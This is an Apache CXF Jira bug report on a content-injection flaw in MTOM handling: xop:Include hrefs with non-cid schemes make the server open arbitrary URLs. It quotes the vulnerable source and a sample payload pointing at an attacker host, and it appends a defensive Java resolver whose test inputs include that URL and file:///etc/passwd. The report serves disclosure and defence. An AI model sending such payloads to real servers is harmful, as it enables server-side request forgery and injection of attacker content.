Chunqing Lin created CXF-8706:
---------------------------------

             Summary: CXF MTOM handler allows content injection
                 Key: CXF-8706
                 URL: https://issues.apache.org/jira/browse/CXF-8706
             Project: CXF
          Issue Type: Bug
          Components: JAXB Databinding
    Affects Versions: 3.5.2
            Reporter: Chunqing Lin


When CXF is used for a SOAP web service or a JAX-RS web service with MTOM enabled, 
the JAXB unmarshaller accepts an XOP Include element whose href attribute uses any 
URL scheme. According to the W3C XOP/MTOM specifications, the href of an xop:Include 
must be a "cid:" URL that refers to a MIME part of the same message; no other scheme 
should be accepted.

The affected call stack is:

    AttachmentUtil.getAttachmentDataSource(String, Collection<Attachment>) line: 554
    JAXBAttachmentUnmarshaller.getAttachmentAsDataHandler(String) line: 49
    MTOMDecorator.startElement(TagName) line: 70

The source code (org.apache.cxf.attachment.AttachmentUtil, CXF 3.5.2) is:

    public static DataSource getAttachmentDataSource(String contentId,
                                                     Collection<Attachment> atts) {
        // Is this right? - DD
        if (contentId.startsWith("cid:")) {
            // "cid:" href: strip the scheme, percent-decode the rest and look
            // the Content-ID up among the attachments of the message.
            try {
                contentId = URLDecoder.decode(contentId.substring(4),
                                              StandardCharsets.UTF_8.name());
            } catch (UnsupportedEncodingException ue) {
                contentId = contentId.substring(4);
            }
            return loadDataSource(contentId, atts);
        } else if (contentId.indexOf("://") == -1) {
            // Bare Content-ID without a scheme: also looked up among the attachments.
            return loadDataSource(contentId, atts);
        } else {// should only take cid for XOP
            // Any other scheme (http:, https:, file:, ...): the href is opened as
            // a URL and whatever it returns is used as the attachment content.
            try {
                return new URLDataSource(new URL(contentId));
            } catch (MalformedURLException e) {
                throw new Fault(e);
            }
        }
    }

 

An attacker can send a request in which an MTOM-optimized element carries an XOP 
Include whose href is not a "cid:" URL, for example:

<stringvalue><inc:Include href="http://attackers.site/exploit/payload"
xmlns:inc="http://www.w3.org/2004/08/xop/include"/></stringvalue>

Because this href contains "://" and does not start with "cid:", 
getAttachmentDataSource wraps it in a URLDataSource: the server opens the 
attacker-chosen URL and the bytes it returns become the value of the element, 
instead of a MIME part that was actually sent with the message.
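For comparison, the following is an added example of how an href resolver for xop:Include can enforce the "cid:" rule. It is not CXF's code and not part of this report; the class name XopHrefResolver, the in-memory map of attachments keyed by Content-ID, and the sample hrefs are all assumptions made for the illustration. It accepts "cid:" URLs (and, like CXF, a bare Content-ID), rejects every other scheme before anything is opened, and never constructs a URL-backed data source, so an href cannot make the server fetch remote content.

```java
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;

/**
 * Hypothetical resolver for the href attribute of an xop:Include element.
 * Only "cid:" references (RFC 2392) or bare Content-IDs are accepted, and
 * they are resolved purely by lookup among the message's own MIME parts.
 * Requires Java 10+ (URLDecoder.decode(String, Charset), InputStream.readAllBytes).
 */
public final class XopHrefResolver {

    /** MIME parts of the current message, keyed by Content-ID (without angle brackets). */
    private final Map<String, byte[]> attachments;

    public XopHrefResolver(Map<String, byte[]> attachments) {
        this.attachments = Collections.unmodifiableMap(new HashMap<>(attachments));
    }

    /** Returns the part the href refers to, or throws if the href is not a cid: reference. */
    public InputStream resolve(String href) {
        String contentId = contentIdOf(href);
        byte[] body = attachments.get(contentId);
        if (body == null) {
            throw new IllegalArgumentException("no attachment with Content-ID <" + contentId + ">");
        }
        return new ByteArrayInputStream(body);
    }

    /**
     * Extracts the Content-ID from an xop:Include href. Any scheme other than
     * "cid" (http:, https:, file:, jar:, ...) is rejected here, before any I/O.
     * A scheme-less value is treated as a bare Content-ID; it is only ever used
     * as a map key, never opened.
     */
    static String contentIdOf(String href) {
        if (href == null || href.isEmpty()) {
            throw new IllegalArgumentException("xop:Include href is missing");
        }
        URI uri;
        try {
            uri = new URI(href);
        } catch (URISyntaxException e) {
            throw new IllegalArgumentException("xop:Include href is not a valid URI: " + href, e);
        }
        String scheme = uri.getScheme();
        if (scheme == null) {
            return href; // bare Content-ID such as "part1@example.org"
        }
        if (!"cid".equalsIgnoreCase(scheme)) {
            throw new IllegalArgumentException(
                "xop:Include href must use the cid: scheme, got " + scheme + ": in " + href);
        }
        // cid: is an opaque URI; the Content-ID is its scheme-specific part, percent-decoded.
        return URLDecoder.decode(uri.getRawSchemeSpecificPart(), StandardCharsets.UTF_8);
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample message with one MTOM part, Content-ID <part1@example.org>.
        Map<String, byte[]> parts = new HashMap<>();
        parts.put("part1@example.org", "hello".getBytes(StandardCharsets.UTF_8));
        XopHrefResolver resolver = new XopHrefResolver(parts);

        String[] hrefs = {
            "cid:part1@example.org",                 // valid: resolves to the part
            "cid:part1%40example.org",               // valid: percent-encoded Content-ID
            "part1@example.org",                     // bare Content-ID, tolerated
            "http://attackers.site/exploit/payload", // rejected: not cid:
            "file:///etc/passwd",                    // rejected: not cid:
            "cid:missing@example.org",               // rejected: no such part
        };
        for (String href : hrefs) {
            try (InputStream in = resolver.resolve(href)) {
                System.out.println(href + " -> " + new String(in.readAllBytes(), StandardCharsets.UTF_8));
            } catch (IllegalArgumentException e) {
                System.out.println(href + " -> rejected: " + e.getMessage());
            }
        }
    }
}
```

The decisive difference from the quoted CXF method is that there is no fallback branch: a value that is neither a cid: URL nor a plain Content-ID is an error, not something to open.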



--
This message was sent by Atlassian Jira
(v8.20.7#820007)
